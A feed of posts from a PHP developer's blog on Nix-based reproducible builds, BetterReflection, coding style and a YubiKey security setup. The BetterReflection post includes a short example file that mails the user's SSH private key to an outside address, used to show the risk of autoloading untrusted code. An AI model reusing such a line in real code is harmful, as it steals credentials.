<![CDATA[Reviving the blog]]> 2026-02-22T00:00:00+00:00 https://ocramius.github.io/blog/reviving-the-blog/ I'm back!

The last time I blogged was in 2017: a lot has changed since then, and after a decade of ignoring blogging, I will attempt to put some regularity into it again.

The times call for it: having a personal space that is truly "our own" is extremely important, and so is having something to read that was written by other humans, not slop.

I mainly stopped blogging for two reasons:

  • WordPress and similar tools are terrible for rarely changing content: I'd rather not blog than host a dynamic website just to serve static webpages.
  • My static site generation pipeline relied heavily on my workstation's software dependencies, which shifted continuously, breaking the website build over and over.

Stabilizing the build

Note: This section describes the Nixification of the blog, done in this pull request. You can skip it if you prefer reading the PR instead.

The first thing to do is to get everything under control again.

A few years back, I started relying heavily on Nix, a lazy, functional language that is perfect for achieving reproducible builds and environments.

At the time of this writing, this website is built via Sculpin, a static website generator whose dependency upgrades I've neglected for far too long.

In order to "freeze" the build in time, I used a Nix Flake to pin all the dependencies down, preventing any further shifts in dependency versions:

{
  inputs = {
    nixpkgs.url = "github:nixos/nixpkgs?ref=nixos-unstable";
    flake-utils.url = "github:numtide/flake-utils";
  };

  outputs = { self, nixpkgs, flake-utils, ... }@inputs:
    flake-utils.lib.eachDefaultSystem (
      system: {
        packages = {
          # things that will stay extremely stable will go here
        };
      }
    ); 
}

The above will "pin" dependencies such as Composer or PHP, preventing them from drifting, unless a commit explicitly moves them: this is thanks to the built-in flake.lock mechanism of Nix Flakes.
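Updating the pins is then a deliberate act rather than an accident. A sketch of the workflow, using the standard Nix flakes CLI:

```shell
# Dependencies only move when flake.lock moves; updating it is explicit:
nix flake update          # re-pin all inputs to their latest revisions
git add flake.lock
git commit -m "Update pinned flake inputs"
```

Until that commit lands, every build sees exactly the same dependency graph.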

Because Composer does not compute content hashes of PHP dependencies, Nix cannot directly use composer.json and composer.lock to download dependencies: that is an obstacle to reproducible builds, and requires a little detour.

Luckily, Sander van der Burg built a very useful composer2nix tool, which can be used to scan composer.lock entries, and compute their content hashes upfront:

{
  inputs = {
    # ...
    composer2nix = {
      url = "github:svanderburg/composer2nix";
      flake = false;
    };
  };
}

As you can see, composer2nix is not a flake: we still manage to use it ourselves, to process composer.lock locally:

update-php-packages = pkgs.writeShellScriptBin "generate-composer-to-nix.sh" ''
  set -euxo pipefail
  TMPDIR="$(${pkgs.coreutils}/bin/mktemp -d)"
  trap 'rm -rf -- "$TMPDIR"' EXIT
  mkdir "$TMPDIR/src"
  mkdir "$TMPDIR/composer2nix"
  ${pkgs.coreutils}/bin/cp -r "${./app}" "$TMPDIR/src/app"
  ${pkgs.coreutils}/bin/cp -r "${composer2nix}/." "$TMPDIR/composer2nix"
  ${pkgs.coreutils}/bin/chmod -R +w "$TMPDIR/composer2nix"
  ${pkgs.php84Packages.composer}/bin/composer install --working-dir="$TMPDIR/composer2nix" --no-scripts --no-plugins
  ${pkgs.php}/bin/php "$TMPDIR/composer2nix/bin/composer2nix" --name=${website-name}
  # composer2nix also emits a default.nix that we do not need: keep only php-packages.nix
  ${pkgs.coreutils}/bin/rm -f default.nix
'';
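As an aside, the mktemp/trap dance used above is a pattern worth keeping around: it gives any script a throwaway workspace that is removed even when the script aborts mid-way. A minimal standalone version:

```shell
set -euo pipefail
# throwaway workspace, cleaned up on ANY exit (success, error, or signal)
TMPDIR="$(mktemp -d)"
trap 'rm -rf -- "$TMPDIR"' EXIT
echo "scratch" > "$TMPDIR/file"
cat "$TMPDIR/file"
```
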

We can now run nix run .#update-php-packages to generate a very useful php-packages.nix, which will be used to produce our vendor/ directory later on.

The generated php-packages.nix looks a lot like this:

let
  packages = {
    "components/bootstrap" = {
      targetDir = "";
      src = composerEnv.buildZipPackage {
        name = "components-bootstrap-fca56bda4c5c40cb2a163a143e8e4271a6721492";
        src = fetchurl {
          url = "https://api.github.com/repos/components/bootstrap/zipball/fca56bda4c5c40cb2a163a143e8e4271a6721492";
          sha256 = "138fz0xp2z9ysgxfsnl7qqgh8qfnhv2bhvacmngnjqpkssz7jagx";
        };
      };
    };
    # ... and more

With that, we can then prepare a stable installation of the website generator:

  # ...
  built-blog-assets = derivation {
    name    = "built-blog-assets";
    src     = with-autoloader; # an intermediate step I omitted in this blogpost: check the original PR for details
    builder = pkgs.writeShellScript "generate-blog-assets.sh" ''
      set -euxo pipefail
      ${pkgs.coreutils}/bin/cp -r $src/. $TMPDIR
      cd $TMPDIR
      ${pkgs.php}/bin/php vendor/bin/sculpin generate --env=prod
      ${pkgs.coreutils}/bin/cp -r $TMPDIR/output_prod $out
    '';
    inherit system;
  };

Running nix build .#built-blog-assets now generates a ./result directory with the full website contents, and we know it won't break unless we update flake.lock, yay!

Let's publish these contents to GitHub Pages:

publish-to-github-pages = pkgs.writeShellScriptBin "publish-blog.sh" ''
  set -euxo pipefail
  TMPDIR="$(${pkgs.coreutils}/bin/mktemp -d)"
  trap 'rm -rf -- "$TMPDIR"' EXIT
  cd "$TMPDIR"
  ${pkgs.git}/bin/git clone git@github.com:Ocramius/ocramius.github.com.git .
  ${pkgs.git}/bin/git checkout master
  ${pkgs.rsync}/bin/rsync --quiet --archive --filter="P .git*" --exclude=".*.sw*" --exclude=".*.un~" --delete "${built-blog-assets}/" ./
  ${pkgs.git}/bin/git add -A :/
  ${pkgs.git}/bin/git commit -a -m "Deploying sculpin-generated pages to \`master\` branch"
  ${pkgs.git}/bin/git push origin HEAD
'';

We can now run nix run .#publish-to-github-pages to deploy the website!

Self-hosting: a minimal container

Since you are one of my smart readers, you probably already noticed how GitHub has been progressively enshittified by its umbilical cord with Microslop.

I plan to move the blog somewhere else soon-ish, so I already prepared an OCI container for it.

Since I will deploy it myself, I want a container with no shell, no root user, no filesystem access.

I stumbled upon mholt/caddy-embed, which embeds an entire static website into a single Go binary: perfect for my use-case.

The Caddy docs suggest using XCaddy for installing modules, but that is yet another build system that I don't want to have anything to do with. Instead, I cloned caddy-embed, and used NixPkgs' Go build system to embed my website into it:

  caddy-module-with-assets = derivation {
    name    = "caddy-module-with-assets";
    builder = pkgs.writeShellScript "generate-blog-assets.sh" ''
      set -euxo pipefail
      ${pkgs.coreutils}/bin/cp -r ${./caddy-embed/.} $out
      ${pkgs.coreutils}/bin/chmod +w $out/files/
      ${pkgs.coreutils}/bin/cp -rf ${built-blog-assets}/. $out/files/
    '';
    inherit system;
  };
  embedded-server = pkgs.buildGo126Module {
    name       = "embedded-server";
    src        = caddy-module-with-assets;
    # annoyingly, this will need to be manually updated at every `go.mod` change :-(
    vendorHash = "sha256-v0YXbAaftLLc+e8/w1xghW5OHRjT7Xi87KyLv1siGSc=";
  };

Same as with PHP, I'm pretty confident that Nix won't break unless flake.lock changes.
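When go.mod does change, the usual trick for recovering the new hash is to let Nix tell you: temporarily set vendorHash to a fake value (e.g. pkgs.lib.fakeHash), rebuild, and copy the correct hash out of the mismatch error. A sketch, using the flake attribute from above:

```shell
# 1. in the flake, set: vendorHash = pkgs.lib.fakeHash;
# 2. rebuild, and read the "got: sha256-..." line from the hash-mismatch error:
nix build .#embedded-server 2>&1 | grep -E 'specified:|got:'
# 3. paste the "got:" hash back into vendorHash
```
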

We can now bundle the built server into a docker container with a single Caddyfile attached. The following is effectively a Dockerfile, but reproducible and minimal:

runnable-container = pkgs.dockerTools.buildLayeredImage {
  name = website-name;
  tag  = "latest";

  contents = [
    (pkgs.writeTextDir "Caddyfile" (builtins.readFile ./caddy-embed/Caddyfile))
  ];

  config = {
    Cmd = [
      "${embedded-server}/bin/caddy-embed"
      "run"
    ];
  };
};

We can now:

  1. build the container via nix build .#runnable-container
  2. load it via docker load < ./result
  3. run it via docker run --rm -ti -p8080:8080 ocramius.github.io:latest
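Since the image intentionally ships no shell, a quick smoke test of that claim (image name as built above):

```shell
# inspect the configured command: just the embedded caddy binary
docker image inspect ocramius.github.io:latest --format '{{.Config.Cmd}}'
# exec-ing a shell should fail outright, because none is included:
docker run --rm --entrypoint /bin/sh ocramius.github.io:latest \
  || echo "no shell in the image, as intended"
```
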

The running container uses ~40 MB of RAM (consider that it holds the entire website in memory), and a quick test with wrk showed that it can handle over 60,000 requests/second on my local machine.

❯ wrk -t 10 -d 30 -c 10  http://localhost:8080/
Running 30s test @ http://localhost:8080/
  10 threads and 10 connections
  Thread Stats   Avg      Stdev     Max   +/- Stdev
    Latency   165.35us   75.09us   3.91ms   90.49%
    Req/Sec     6.12k   365.53     7.05k    92.46%
  1833101 requests in 30.10s, 23.32GB read
Requests/sec:  60901.74
Transfer/sec:    793.44MB

Cleaning up the website

While cleaning up the builds, I found some really horrible stuff that should've gone away much earlier:

Google Analytics: kill it with fire! I'm not here to "convert visits": I'm here to help out my readers and make new connections. I am not a marketing department, and the privacy of my website visitors is more important than a website ticker that sends data to a US-based company.

Leftover JS/CSS: the website had various external CDNs in use, with CSS and JS files that were not really in use anymore. Cleaning these up felt good, and also reduced the number of external sites to zero.

Navigation menu: this is a static website. An animated "burger menu" was certainly interesting a decade ago, but nowadays it is just an annoying distraction, adding extra navigation steps for visitors.

Disqus: this used to be a useful way to embed a threaded comment section inside a static website, but it is no longer relevant to me, as it becomes an extra inbox to manage. Disqus was also cluttered with trackers, which should not be there.

Next steps?

This first post is about "being able to blog again", but there's more to do.

I certainly want to self-host things, having my blog under my own domain, rather than under *.github.io.

I also want comments again, but they need to come from the Fediverse, rather than being land-locked in a commenting platform. Other people have attempted this, and I shall do it too.

Perhaps I'll remove that 3D avatar at the top of the page? It took a lot of time to build with Blender and THREEJS, and it uses your video card to run: perhaps not the most energy-efficient choice for a static website, but I'm still emotionally attached to it.

Also, this website is filled with reference information that no longer holds true: a decade has passed, my OSS positions have vastly changed, and the pages describing what I do will change with them.

Finally, I want it to be clear that this is a website by a human, for other humans: I will therefore start cryptographically signing my work, allowing others to decide whether they trust that I wrote it myself, without a machine generating any of it.

And you?

If you are still here and reading: thank you for passing by, dear fellow human.

Hoping that this has inspired you a bit, I'm looking forward to seeing your own efforts to self-host your own website!

]]>
<![CDATA[BetterReflection version 2.0.0 released]]> 2017-09-18T00:00:00+00:00 https://ocramius.github.io/blog/roave-better-reflection-v2.0/ Roave's BetterReflection 2.0.0 was released today!

James Titcumb and I started working on this project back in 2015, and it is a pleasure to see it reach maturity.

The initial idea was simple: James would implement all my wicked ideas, while I would lay back and get drunk on Drambuie.

Me, drunk in bed. Photo by @Asgrim, since I was too drunk to human

Yes, that actually happened. Thank you, James, for all the hard work! 🍻

(I did some work too, by the way!)

What the heck is BetterReflection?

Jokes aside, the project is quite ambitious: it aims at reproducing the entirety of the PHP reflection API without triggering any actual autoloading.
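For those following along, installation is a single Composer requirement (constraint matching this release):

```shell
composer require roave/better-reflection:^2.0
```
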

When put in use, it looks like this:

<?php

// src/MyClass.php

namespace MyProject;

class MyClass
{
    public function something() {}
}
<?php

// example1.php

use MyProject\MyClass;
use Roave\BetterReflection\BetterReflection;
use Roave\BetterReflection\Reflection\ReflectionMethod;

require_once __DIR__ . '/vendor/autoload.php';

$myClass = (new BetterReflection())
    ->classReflector()
    ->reflect(MyClass::class);

$methodNames = \array_map(function (ReflectionMethod $method) : string {
    return $method->getName();
}, $myClass->getMethods());

\var_dump($methodNames);

// class was not loaded:
\var_dump(\sprintf('Class %s loaded: ', MyClass::class));
\var_dump(\class_exists(MyClass::class, false));

As you can see, the difference is just in how you bootstrap the reflection API.

Also, we do provide a fully backwards-compatible reflection API that you can use if your code heavily relies on ext-reflection:

<?php

// example2.php

use MyProject\MyClass;
use Roave\BetterReflection\BetterReflection;
use Roave\BetterReflection\Reflection\Adapter\ReflectionClass;

require_once __DIR__ . '/vendor/autoload.php';

$myClass = (new BetterReflection())
    ->classReflector()
    ->reflect(MyClass::class);

$reflectionClass = new ReflectionClass($myClass);

// You can just use it wherever you had `ReflectionClass`!
\var_dump($reflectionClass instanceof \ReflectionClass);
\var_dump($reflectionClass->getName());

How does that work?

The operational concept is quite simple, really:

  1. We scan your codebase for files matching the one containing your class. This is fully configurable, but by default we use some ugly autoloader hacks to find the file without wasting disk I/O.
  2. We feed your PHP file to PHP-Parser
  3. We analyse the produced AST and wrap it in a matching Roave\BetterReflection\Reflection\* class instance, ready for you to consume it.

The hard part is tracking the myriad of details of the PHP language, which is very complex and cluttered with scope, visibility and inheritance rules: we take care of that for you.

Use case scenarios

The main use-cases for BetterReflection are most likely around security, code analysis and AOT compilation.

One of the most immediate use-cases will likely be in PHPStan, which will finally be able to inspect hideous mixed OOP/functional/procedural code if the current WIP implementation works as expected.

Since you can now "work" with code before having loaded it, you can harden APIs in a lot of security-sensitive contexts. A serializer may decide not to load a class if side-effects are contained in the file declaring it:

<?php

// Evil.php
\mail(
    '[email protected]',
    'All ur SSH keys are belong to us',
    \file_get_contents('~/.ssh/id_rsa')
);

// you really don't want to autoload this bad one:
class Evil {}

The same goes for classes implementing malicious __destruct code, as well as classes that may trigger autoloading of other malicious code.

It is also possible to analyse code that is downloaded from the internet without actually running it. For instance, code may be checked against a GPG signature shipped alongside the file before being run, effectively allowing PHP to "run only signed code". Composer, anybody?
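A sketch of how such a gate could look on the consuming side (file names are illustrative, and a detached signature is assumed to ship next to the file):

```shell
# only hand the file to PHP if the detached signature verifies
if gpg --verify Evil.php.sig Evil.php 2>/dev/null; then
    php Evil.php
else
    echo "unsigned or tampered code: refusing to load" >&2
fi
```
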

If you are more into code analysis, you may decide to compare two different versions of a library, and scan for BC breaks:

<?php
// the-library/v1/src/SomeApi.php

class SomeAPI
{
    public function sillyThings() { /* ... */ }
}
<?php
// the-library/v2/src/SomeApi.php

class SomeAPI
{
    public function sillyThings(UhOh $bcBreak) { /* ... */ }
}

In this scenario, somebody added a mandatory parameter to SomeAPI#sillyThings(), effectively introducing a BC break that is hard to detect without having both versions of the code available, or good migration documentation (library developers: please document this kind of change!).

Another way to leverage the power of this library is to compile factory code into highly optimised dependency injection containers, like PHP-DI started doing.

Future use cases?

In addition to the above use-case scenarios, we are working on additional functionality that would allow changing code before loading it.

Is that a good idea?

... I honestly don't know.

Still, there are proper use-case scenarios around AOP and proxying libraries, which would then be able to work even with final classes.

You will likely see these features appear in a new, separate library.

Credits

To conclude, I would like to thank James Titcumb, Jaroslav Hanslík, Marco Perone and Viktor Suprun for the effort they put into this release, providing patches, improvements and overall helping us build something that may become extremely useful in the PHP ecosystem.

]]>
<![CDATA[Eliminating Visual Debt]]> 2017-05-29T00:00:00+00:00 https://ocramius.github.io/blog/eliminating-visual-debt/ Today we're talking about Visual debt in our code.

As an introduction, I suggest watching this short tutorial about visual debt by @jeffrey_way.

The concept is simple: let's take the example from Laracasts and re-visit the steps taken to remove visual debt.

interface EventInterface {
    public function listen(string $name, callable $handler) : void;
    public function fire(string $name) : bool;
}

final class Event implements EventInterface {
    protected $events = [];

    public function listen(string $name, callable $handler) : void
    {
        $this->events[$name][] = $handler;
    }

    public function fire(string $name) : bool
    {
        if (! array_key_exists($name, $this->events)) {
            return false;
        }

        foreach ($this->events[$name] as $event) {
            $event();
        }

        return true;
    }
}

$event = new Event;

$event->listen('subscribed', function () {
    var_dump('handling it');
});

$event->listen('subscribed', function () {
    var_dump('handling it again');
});

$event->fire('subscribed');

So far, so good.

We have an event that obviously fires itself, a concrete implementation and a few subscribers.

Our code works, but it contains a lot of useless artifacts that do not really influence our ability to make it run.

These artifacts are also distracting, moving our focus from the runtime to the declarative requirements of the code.

Let's start removing the bits that aren't needed by starting from the method parameter and return type declarations:

interface EventInterface {
    public function listen($name, $handler);
    public function fire($name);
}

final class Event implements EventInterface {
    protected $events = [];

    public function listen($name, $handler)
    {
        $this->events[$name][] = $handler;
    }

    public function fire($name)
    {
        if (! array_key_exists($name, $this->events)) {
            return false;
        }

        foreach ($this->events[$name] as $event) {
            $event();
        }

        return true;
    }
}

Our code is obvious, so the parameters don't need redundant declarations or type checks. Also, we are aware of our own implementation, so the runtime checks are not needed, as the code will work correctly as per manual or end to end testing. A quick read will also provide sufficient proof of correctness.

Since the code is trivial and we know what we are doing when using it, we can also remove the contract that dictates the intended usage. Let's remove those implements and interface symbols.

final class Event {
    protected $events = [];

    public function listen($name, $handler)
    {
        $this->events[$name][] = $handler;
    }

    public function fire($name)
    {
        if (! array_key_exists($name, $this->events)) {
            return false;
        }

        foreach ($this->events[$name] as $event) {
            $event();
        }

        return true;
    }
}

Removing the contract doesn't change the runtime behavior of our code, which is still technically correct. Consumers will also not need to worry about correctness when they use `Event`, as a quick skim over the implementation will reveal its intended usage.

Also, since the code imposes no limitations on the consumer, who is responsible for the correctness of any code touching ours, we are not going to limit the usage of inheritance.

class Event {
    // ... 
}

That's as far as the video goes, with a note that the point is to "question everything".

Bringing it further

Jeffrey then pushed this a bit further, saying that best practices don't exist, and people are pretty much copying stale discussions about coding approaches:

Following that logic, I'm going to question the naming chosen for our code. Since the code is trivial and understandable at first glance, we don't need to pick meaningful names for variables, methods and classes:

class A {
    protected $a = [];

    public function a1($a1, $a2)
    {
        $this->a[$a1][] = $a2;
    }

    public function a2($a1)
    {
        if (! array_key_exists($a1, $this->a)) {
            return false;
        }

        foreach ($this->a[$a1] as $a) {
            $a();
        }

        return true;
    }
}

This effectively removes our need to look at the code details, making the code shorter and runtime-friendly. We're also saving some space in the PHP engine!

Effectively, this shows us that there are upsides to this approach, as we trade read overhead for less engine overhead. We also stop obsessing over the details of our Event, as we already defined it previously, so we remember how to use it.

Since the Event type is not really useful to us, as nothing type-hints against it, we can remove it. Let's move back to dealing with a structure of function pointers:

function A () {
    $a = [];

    return [
        function ($a1, $a2) use (& $a) {
            $a[$a1][] = $a2;
        },
        function ($a1) use (& $a) {
            if (! array_key_exists($a1, $a)) {
                return false;
            }

            foreach ($a[$a1] as $a2) {
                $a2();
            }

            return true;
        },
    ];
}


$a = A();

$a[0]('subscribed', function () {
    var_dump('handling it');
});

$a[0]('subscribed', function () {
    var_dump('handling it again');
});

$a[1]('subscribed');

This code is equivalent, and doesn't use any particularly fancy structures coming from the PHP language, such as classes. We are working towards reducing the learning and comprehension overhead.

Conclusion

If you haven't noticed before, this entire post is just sarcasm.

Please don't do any of what is discussed above, it is a badly crafted oxymoron.

Please don't accept what Jeffrey says in that video.

Please do use type systems when they are available, they actually reduce "visual debt" (is it even a thing?), helping you distinguish apples from pies.

Please do use interfaces, as they reduce clutter, making things easier to follow from a consumer perspective, be it a human or an automated tool.

This is all you need to understand that Event mumbo-jumbo (which has broken naming, by the way, but this isn't an architecture workshop). Maybe add some API doc:

interface EventInterface {
    /**
     * Attach an additional listener to be fired when calling 
     * `fire` with `$name`
     */
    public function listen(string $name, callable $handler) : void;

    /**
     * Execute all listeners assigned to `$name`
     *
     * @return bool whether any listener was executed
     */
    public function fire(string $name) : bool;
}

This is not a really good interface, but it's a clear, simple and readable one. No "visual debt". Somebody reading this will thank you later. Maybe it will be you, next year.

Please do follow best practices. They work. They help you avoid stupid mistakes. Bad code can lead to terrible consequences, and you don't know where your code will be used. And yes, I'm picking examples about real-time computing, because that's what makes it to the news. OWASP knows more about all this.

Please remember that your job is reading, understanding and thinking before typing, and typing is just a side-effect.

And please, please, please: remember that most of your time you are not coding for yourself alone. You are coding for your employer, for your team, for your project, for your future self.

]]>
<![CDATA[YubiKey for SSH, Login, 2FA, GPG and Git Signing]]> 2017-04-15T00:00:00+00:00 https://ocramius.github.io/blog/yubikey-for-ssh-gpg-git-and-local-login/ I've been using a YubiKey Neo for a bit over two years now, but its usage was limited to 2FA and U2F.

Last week, I received my new DELL XPS 15 9560, and since I am maintaining some high impact open source projects, I wanted the setup to be well secured.

In addition to that, I caught a bad flu, and that gave me enough excuses to waste time in figuring things out.

In this article, I'm going to describe what I did, and how you can reproduce my setup for your own safety, as well as that of the people who trust you.

Yubi-WHAT?

First of all, you should know that I am absolutely not a security expert: all I did was follow the online tutorials that I found. I am also not a cryptography expert, and I am constantly dissatisfied with how the crypto community reduces everything into a TLA, making even the simplest things impossible to understand for mere mortals.

First, let's clarify what a YubiKey is.

A YubiKey Neo on a cat

That thing is a YubiKey.

What does it do?

It's basically a USB key filled with crypto features. It is also (currently) impossible to make a physical copy of it, and it is not possible to extract information written to it.

It can:

  • Generate HMAC hashes (kinda)
  • Store GPG private keys
  • Act as a keyboard that generates time-based passwords
  • Generate 2FA time-based login codes

What do we need?

In order to follow this tutorial, you should have at least 2 (two) YubiKey Neo or equivalent devices. This means that you will have to spend approximately USD 100: these things are quite expensive. You absolutely need a backup key, because all these security measures may lock you out of your systems if you lose or damage one.

Our kickass setup will allow us to do a series of cool things related to daily development operations:

  • Two Factor Authentication
  • PAM Authentication (logging into your linux/mac PC)
  • GPG mail and GIT commit signing/encrypting
  • SSH Authentication

Covered YubiKey features

I am not going to describe the procedures in detail, but just link them and describe what we are doing, and why.

Setting up NFC 2FA

Simple NFC-based 2FA with authentication codes will be useful for most readers, even non-technical ones.

What we are doing is simply seeding the YubiKey with Google Authenticator codes, except that we will use the Yubico Authenticator. This will only work for the "primary" key (the one we will likely bring with us at all times).

What we will have to do is basically:

  1. Install some Yubico utility to manage your Yubikey NEO
  2. Plug in your YubiKey and enable OTP and U2F
  3. Install the Yubico Authenticator
  4. Seed your Yubikey with the 2FA code provided by a compatible website

The setup steps are described on the official Yubico website.

Once the YubiKey is configured with at least one website that supports the "Google Authenticator" workflow, we should be able to:

  1. Open the Yubico Authenticator
  2. Tap the YubiKey against our phone's NFC sensor
  3. Use the generated authentication code

Example Yubico Authenticator screen

One very nice (and unclear, at first) advantage of having a YubiKey seeded with 2FA codes is that we can now generate 2FA codes on any phone, as long as we have our YubiKey with us.

I already had to remote-lock and remote-erase a phone in the past, and losing the Google Authenticator settings is not fun. If you handle your YubiKey with care, you shouldn't have that problem anymore.

Also, a YubiKey is water-proof: our 2017 phone probably isn't.

Setting up PAM authentication

CAUTION: this procedure can potentially lead us to lose sudo access from our account, as well as lock us out of our computer. I take no responsibility: try it in a VM first, if you do not feel confident.

We want to make sure that we can log into our personal computer or workstation only when we are physically sitting at it. This means that the YubiKey must be plugged in for a password authentication to succeed.

Each login prompt, user password prompt or sudo command should require both our account password and our YubiKey.

What we will have to do is basically:

  1. Install libpam-yubico
  2. Enable some capabilities of our YubiKeys with ykpersonalize
  3. Generate an initial challenge file for each YubiKey (you bought at least 2, right?) with ykpamcfg
  4. Deploy the generated files in a root-only accessible path
  5. IMPORTANT start a sudo session, and be ready to revert changes from there if things go wrong
  6. Configure PAM to also expect a challenge response from a YubiKey (reads: a recognized YubiKey must be plugged in when trying to authenticate)
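Steps 2-4 look roughly like this, per the Yubico challenge-response documentation (slot 2 is assumed to be free on the key, and the destination path is illustrative):

```shell
# program slot 2 of the key for HMAC-SHA1 challenge-response
ykpersonalize -2 -ochal-resp -ochal-hmac -ohmac-lt64 -oserial-api-visible
# generate the initial challenge state file (lands in ~/.yubico/)
ykpamcfg -2 -v
# move the state somewhere only root can touch (hypothetical path)
sudo mkdir -p /var/yubico/challenges
sudo mv ~/.yubico/challenge-* /var/yubico/challenges/
```
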

The steps to perform that are in the official Yubico tutorial.

If everything is done correctly, every prompt asking for our Linux/Mac account password should fail when no YubiKey is plugged in.

TIP: configure the libpam-yubico integration in debug mode, as we will often have a "WTH?" reaction when authentication isn't working. That may happen if there are communication errors with the YubiKey.

This setup has the advantage of locking out anyone trying to bruteforce our password, as well as stopping potentially malicious background programs from performing authentication or sudo commands while we aren't watching.

CAUTION: the point of this sort of setup is to guarantee that login can only happen with the physical person at the computer. If we want to go to the crapper, we lock our computer, and bring our YubiKey with us.

Setting up GPG

This is probably the messiest part of the setup, as a lot of CLI tool usage is required.

Each YubiKey has the ability to store 3 separate keys for signing, encrypting and authenticating.

We will therefore create a series of GPG keys:

  1. A GPG master key (if we don't already have a GPG key)
  2. A sub-key for signing (marked [S] in the gpg interactive console)
  3. A sub-key for encrypting (marked [E] in the gpg interactive console)
  4. A sub-key for authenticating (marked [A] in the gpg interactive console)
  5. Generate these 3 sub-keys for each YubiKey we have (3 keys per YubiKey)

CAUTION: as far as I know, the YubiKey Neo only supports RSA keys up to 2048 bits long. Do not use 4096 for the sub-key length unless you know that your device supports it.
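The key-creation part (steps 1-4) can be scripted with GnuPG's quick commands (available since GnuPG 2.1); the name, email and expiry values here are illustrative:

```shell
# master (certify-only) key, no expiry
gpg --quick-generate-key "Your Name <you@example.com>" rsa2048 cert never
# grab the new key's fingerprint
FPR="$(gpg --list-keys --with-colons you@example.com | awk -F: '/^fpr/ {print $10; exit}')"
# one sub-key per YubiKey slot: sign [S], encrypt [E], authenticate [A]
gpg --quick-add-key "$FPR" rsa2048 sign 1y
gpg --quick-add-key "$FPR" rsa2048 encr 1y
gpg --quick-add-key "$FPR" rsa2048 auth 1y
```
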

After that, we will move the private keys to the YubiKeys with the gpg keytocard command.

CAUTION: the keytocard command is destructive. Once we've moved a private key to a YubiKey, it is removed from our local machine, and it cannot be recovered. Be sure to only move the correct sub-keys.

NOTE: being unable to recover the private sub-key is precisely the point of using a YubiKey: nobody can steal or misuse those keys, no malicious program can copy them, plus we can use them from any workstation.

Also, we will need to set a PIN and an admin PIN. The defaults for these two are 123456 and 12345678, respectively. The PIN will be needed each time we plug in our YubiKey to use any of the private keys stored on it.

CAUTION: we only have 3 attempts for entering our PIN. Should we fail all attempts, the YubiKey will be locked, and we will have to move new GPG sub-keys to it before being able to use it again. This prevents bruteforcing after physical theft.

After our gpg sub-keys and PINs are written to the YubiKeys, let's make a couple of secure backups of our master gpg secret key, then delete it from the computer, keeping just the public key.

The master private gpg key should only be used to generate new sub-keys, if needed, or to revoke them, if we lose one or more of our physical devices.

We should now be able to:

  • Sign messages with the signing key stored in our YubiKey (only if plugged in) and its PIN
  • Verify those messages with the master public key
  • Encrypt messages with the master public key
  • Decrypt messages with the encryption key stored in the YubiKey (only if plugged in) and its PIN

The exact procedure to achieve all this is described in detail (with console output and examples) at drduh/YubiKey-Guide.

GIT commit signing

Now that we can sign messages using the GPG key stored in our YubiKey, usage with Git becomes trivial:

git config --global user.signingkey <yubikey-signing-sub-key-id>

We will now need to plug in our YubiKey and enter our PIN when signing a tag:

git tag -s this-is-a-signed-tag -m "foo"

Nobody can release software on our behalf without physical access to our YubiKey and knowledge of its PIN.
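If we want every commit (and not just tags) to be signed by default, git can be configured accordingly — a sketch using standard git options:

```shell
# Sign all commits by default, not only annotated tags:
git config --global commit.gpgsign true

# Verify signatures when inspecting history:
git log --show-signature -1
git verify-tag this-is-a-signed-tag
```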

Signing/Encrypting email messages

In order to sign/encrypt emails, we will need to install Mozilla Thunderbird and Enigmail.

The setup will crash a few times. I suggest going through the "advanced" settings, then actually selecting a signing/encryption key when trying to send a signed/encrypted message. Enigmail expects the key to be a file or similar, but this approach will allow us to just give it the private GPG key identifier.

Sending mails is still a bit buggy: Thunderbird will ask for the PIN 3 times, as if authentication had failed, but the third attempt will actually succeed. This behavior is present in a number of prompts, not just within Thunderbird.

Nobody can read our encrypted emails unless the YubiKey is plugged in. If our laptop is stolen, these secrets remain protected.

SSH authentication

There is one GPG key that we didn't use yet: the authentication one.

There is a (relatively) recent functionality of gpg-agent that allows it to behave as an ssh-agent.

To make that work, we will simply kill all existing SSH and GPG agents:

sudo killall gpg-agent
sudo killall ssh-agent
# note: eval is used because the produced STDOUT is a bunch of ENV settings
eval $( gpg-agent --daemon --enable-ssh-support )

Once we've done that, let's try running:

ssh-add -L

Assuming we don't have any local SSH keys, the output should be something like:

ocramius@ocramius-XPS-15-9560:~$ ssh-add -L
The agent has no identities.

If we plug in our YubiKey and try again, the output will be:

ocramius@ocramius-XPS-15-9560:~$ ssh-add -L
ssh-rsa AAAAB3NzaC ... pdqtlwX6m1 cardno:000123457915

MAGIC! gpg-agent is exposing the public GPG key as an SSH key.

If we upload this public key to a server, and then try logging in with the YubiKey plugged in, we will be asked for the YubiKey PIN, and will then just be able to log in as usual.

Nobody can log into our remote servers without having the physical key device.

We can log into our remote servers from any computer that can run gpg-agent, as long as we always bring our YubiKey with us.

CAUTION: Each YubiKey with an authentication gpg sub-key will produce a different public SSH key: we will need to seed our server with all the SSH public keys.

TIP: consider using the YubiKey identifier (written on the back of the device) as the comment for the public SSH key, before storing it.

Steps to set up gpg-agent for SSH authentication are also detailed in drduh/YubiKey-Guide.
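On newer GnuPG (2.1+), a sketch of making this setup persistent is enabling SSH support in gpg-agent's configuration and pointing SSH_AUTH_SOCK at the agent's socket (exact paths may vary per distribution):

```shell
# One-time: enable the ssh-agent emulation in gpg-agent
echo "enable-ssh-support" >> ~/.gnupg/gpg-agent.conf

# In ~/.bashrc or similar: let SSH talk to gpg-agent's socket
export SSH_AUTH_SOCK="$(gpgconf --list-dirs agent-ssh-socket)"
gpg-connect-agent updatestartuptty /bye > /dev/null
```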

Custom SSH keys are no longer needed: our GPG keys cover most usage scenarios.

Conclusion

We now have at least 2 physical devices that give us access to very critical parts of our infrastructure, messaging, release systems and computers in general.

At this point, I suggest keeping one always with ourselves, and treating it with extreme care. I made a custom 3d-printed case for my YubiKey, and then put it all together in my physical keychain:

My physical keychain

The backup key is to be kept in a secure location: while theft isn't a big threat with YubiKeys, getting locked out of all our systems is a problem. Make sure that you can always either recover a YubiKey or the master GPG key.

]]>
<![CDATA[On Aggregates and Domain Service interaction]]> 2017-01-25T00:00:00+00:00 https://ocramius.github.io/blog/on-aggregates-and-external-context-interactions/ Some time ago, I was asked where I put I/O operations when dealing with aggregates.

The context was a CQRS and Event Sourced architecture, but in general, the approach that I prefer also applies to most imperative ORM entity code (assuming a proper data-mapper is involved).

Scenario

Let's use a practical example:

Feature: credit card payment for a shopping cart checkout

  Scenario: a user must be able to check out a shopping cart
    Given the user has added some products to their shopping cart
    When the user checks out the shopping cart with their credit card
    Then the user was charged for the shopping cart total price

  Scenario: a user must not be able to check out an empty shopping cart
    When the user checks out the shopping cart with their credit card
    Then the user was not charged

  Scenario: a user cannot check out an already purchased shopping cart
